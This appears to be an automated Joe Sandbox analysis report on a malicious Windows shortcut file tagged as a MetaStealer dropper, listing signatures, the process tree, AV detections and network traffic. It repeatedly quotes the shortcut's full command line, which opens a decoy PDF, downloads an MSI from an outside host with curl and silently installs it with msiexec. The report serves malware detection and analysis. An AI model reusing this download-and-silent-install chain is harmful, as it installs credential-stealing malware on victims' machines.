Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
thUKanu6GD.lnk

Overview

General Information

Sample name:thUKanu6GD.lnk
renamed because original name is a hash value
Original sample name:0a9302f5cbdcc6a3d75a904c947c9147.lnk
Analysis ID:1632262
MD5:0a9302f5cbdcc6a3d75a904c947c9147
SHA1:7ede6ba3382299dc117f82aced5e51b1a0a01d24
SHA256:e95e5480b291b646297e1bcbd6ab0eb3e4fec53084b714c26271973403e010f7
Tags:lnkMetaStealeruser-abuse_ch
Infos:

Detection

HTMLPhisher, MalLnk
Score:92
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected BlockedWebSite
Yara detected malicious lnk
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Enables debug privileges
IP address seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: MsiExec Web Install
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 7080 cmdline: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msedge.exe (PID: 6160 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 6720 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=2088,i,11631974867291312252,14733990971221578511,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • curl.exe (PID: 6412 cmdline: curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • msiexec.exe (PID: 6660 cmdline: msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn MD5: E5DA170027542E25EDE42FC54C929077)
    • taskkill.exe (PID: 6736 cmdline: Taskkill /f /im cmd.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • msiexec.exe (PID: 6756 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • msedge.exe (PID: 1080 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7096 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 2664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6272 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 6956 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6496 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 6868 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 7132 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • msedge.exe (PID: 8400 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7416 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:6 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6460 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
thUKanu6GD.lnkJoeSecurity_MalLnkYara detected malicious lnkJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\bosfortuy.msJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe, CommandLine: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe, ProcessId: 7080, ProcessName: cmd.exe
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe, CommandLine: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe, ProcessId: 7080, ProcessName: cmd.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://559236.na3.to/gift/setup4391.msiAvira URL Cloud: Label: malware
      Source: thUKanu6GD.lnkVirustotal: Detection: 19%Perma Link
      Source: thUKanu6GD.lnkReversingLabs: Detection: 13%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability

      Phishing

      barindex
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bosfortuy.ms, type: DROPPED
      Source: global trafficTCP traffic: 192.168.2.6:50260 -> 1.1.1.1:53
      Source: Joe Sandbox ViewIP Address: 2.22.242.11 2.22.242.11
      Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
      Source: Joe Sandbox ViewIP Address: 185.172.148.132 185.172.148.132
      Source: Joe Sandbox ViewIP Address: 172.64.41.3 172.64.41.3
      Source: global trafficHTTP traffic detected: GET /392171258/files/doc_downloads/test.pdf HTTP/1.1Host: s28.q4cdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
      Source: global trafficHTTP traffic detected: GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
      Source: global trafficHTTP traffic detected: OPTIONS /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveOrigin: https://business.bing.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: s28.q4cdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
      Source: global trafficHTTP traffic detected: POST /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveContent-Length: 471Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
      Source: global trafficHTTP traffic detected: OPTIONS /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveOrigin: https://business.bing.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
      Source: global trafficHTTP traffic detected: POST /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveContent-Length: 466Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.163
      Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.163
      Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.163
      Source: unknownTCP traffic detected without corresponding DNS query: 68.70.205.3
      Source: unknownTCP traffic detected without corresponding DNS query: 68.70.205.3
      Source: unknownTCP traffic detected without corresponding DNS query: 68.70.205.3
      Source: unknownTCP traffic detected without corresponding DNS query: 68.70.205.3
      Source: unknownTCP traffic detected without corresponding DNS query: 68.70.205.3
      Source: unknownTCP traffic detected without corresponding DNS query: 68.70.205.3
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.179.56
      Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.163
      Source: global trafficHTTP traffic detected: GET /392171258/files/doc_downloads/test.pdf HTTP/1.1Host: s28.q4cdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
      Source: global trafficHTTP traffic detected: GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: s28.q4cdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
      Source: global trafficHTTP traffic detected: GET /gift/setup4391.msi HTTP/1.1Host: 559236.na3.toUser-Agent: curl/7.83.1Accept: */*
      Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
      Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
      Source: 000003.log6.12.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
      Source: 000003.log6.12.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
      Source: 000003.log6.12.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: 559236.na3.to
      Source: global trafficDNS traffic detected: DNS query: s28.q4cdn.com
      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
      Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
      Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: keycdnDate: Fri, 07 Mar 2025 20:40:16 GMTContent-Type: text/htmlContent-Length: 1439Connection: closeETag: "5ca0a75f-59f"X-Edge-Location: defr
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 20:40:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bk8D4yWya%2Fjc5IrEFAz%2Fp3eIVrswZsx1TQSQ8eGXyw81zSLyuWgJV4rIlEZ1avWrvHaaF8Be3JUY40BSpBHO8q8svSS8ln%2F2mWbmOtW0k1vzLVnw0yLGmja%2B2v4xGTb9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cce7dffed94217-EWRData Raw: 31 31 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 Data Ascii: 11d3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Suspected phishing site | Cloudflare</title>
      Source: curl.exe, 00000006.00000002.1292739432.000001BE71240000.00000004.00000020.00020000.00000000.sdmp, thUKanu6GD.lnkString found in binary or memory: http://559236.na3.to/gift/setup4391.msi
      Source: curl.exe, 00000006.00000003.1292046582.000001BE71256000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.1291995920.000001BE71253000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1292839683.000001BE71256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://559236.na3.to/gift/setup4391.msi2
      Source: curl.exe, 00000006.00000003.1292046582.000001BE71256000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.1291995920.000001BE71253000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1292839683.000001BE71256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://559236.na3.to/gift/setup4391.msiV
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://bard.google.com/
      Source: Reporting and NEL.13.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
      Source: service_worker_bin_prod.js.12.dr, offscreendocument_main.js.12.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
      Source: Web Data.12.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: Web Data.12.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: manifest.json.12.drString found in binary or memory: https://chrome.google.com/webstore/
      Source: manifest.json.12.drString found in binary or memory: https://chromewebstore.google.com/
      Source: c3c0b809-94b6-4f44-893d-1b9e51a3b060.tmp.13.drString found in binary or memory: https://clients2.google.com
      Source: manifest.json0.12.drString found in binary or memory: https://clients2.google.com/service/update2/crx
      Source: c3c0b809-94b6-4f44-893d-1b9e51a3b060.tmp.13.drString found in binary or memory: https://clients2.googleusercontent.com
      Source: Reporting and NEL.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
      Source: manifest.json0.12.drString found in binary or memory: https://docs.google.com/
      Source: manifest.json0.12.drString found in binary or memory: https://drive-autopush.corp.google.com/
      Source: manifest.json0.12.drString found in binary or memory: https://drive-daily-0.corp.google.com/
      Source: manifest.json0.12.drString found in binary or memory: https://drive-daily-1.corp.google.com/
      Source: manifest.json0.12.drString found in binary or memory: https://drive-daily-2.corp.google.com/
      Source: manifest.json0.12.drString found in binary or memory: https://drive-daily-3.corp.google.com/
      Source: manifest.json0.12.drString found in binary or memory: https://drive-daily-4.corp.google.com/
